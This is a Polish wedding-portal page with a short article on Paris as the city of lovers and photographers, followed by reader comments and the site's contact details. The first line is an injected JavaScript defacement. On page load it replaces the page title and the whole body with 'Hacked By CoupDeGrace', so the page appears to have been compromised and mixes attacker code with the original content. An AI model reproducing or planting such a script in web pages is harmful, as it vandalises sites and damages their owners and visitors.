document.addEventListener('DOMContentLoaded', function(){document.title='Hacked By CoupDeGrace';document.body.style.cssText='margin:0;overflow:hidden';document.body.innerHTML='
Hacked By CoupDeGrace
';});

O północy w Paryżu.

Paryż  nazywany jest  miastem zakochanych, miastem miłości. Czy wiecie dlaczego?


Może dlatego, że akcja większości klasycznych filmów o miłości rozgrywa się w urokliwej Francji i romantycznym Paryżu.
A może dlatego, że paryski, fantastyczny klimat, jego wąskie uliczki, urokliwe kawiarenki wprost na ulicy i wszechobecna muzyka  przyciągają zakochane pary z całego świata? A  może i dlatego, że język francuski jest bardzo piękny i poruszający i ma niesamowite brzmienie.

Paryż to też kolebka mody i sztuki. To ogrom wspaniałych zabytków, muzeów i galerii. To ciągle wpisana w ducha miasta belle époque

Paryż to też ulubione miejsce fotografów - zobaczcie sami.

 

 

Fotografie: Zebra - Studio Multimedialne  / www.zebradesign.pl

Oceń ten artykuł
(5 głosów)

2 komentarzy

  • Link do komentarza studiowizja poniedziałek, 14 kwiecień 2014 11:04 napisane przez studiowizja

    Świetna sprawa - sesja ślubna w innym kraju
    Również polecamy

  • Link do komentarza aliii czwartek, 30 styczeń 2014 17:37 napisane przez aliii

    super zdjecia

Skomentuj

 

O nas

Portal ślubny www.abcslubu.pl powstał w 2006 roku z myślą o Tych wszystkich, którzy są przed lub w trakcie organizacji przyjęcia weselnego.
Jako ekspert w branży ślubnej i wiodący serwis wyróżniamy się materiałami poradniczymi, kreowaniem trendów, inspiracjami i autorskimi, tematycznymi sesjami ślubnymi.

Kontakt

D z i a ł   P r o m o c j i  i  R e k l a m y  abcslubu.pl
osoba kontaktowa: Magdalena Barska  magdalena.barska@abcslubu.pl kom.: 509 719 339


Biuro jest czynne od poniedziałku do piątku,
w godzinach od 9:00 do 17:00.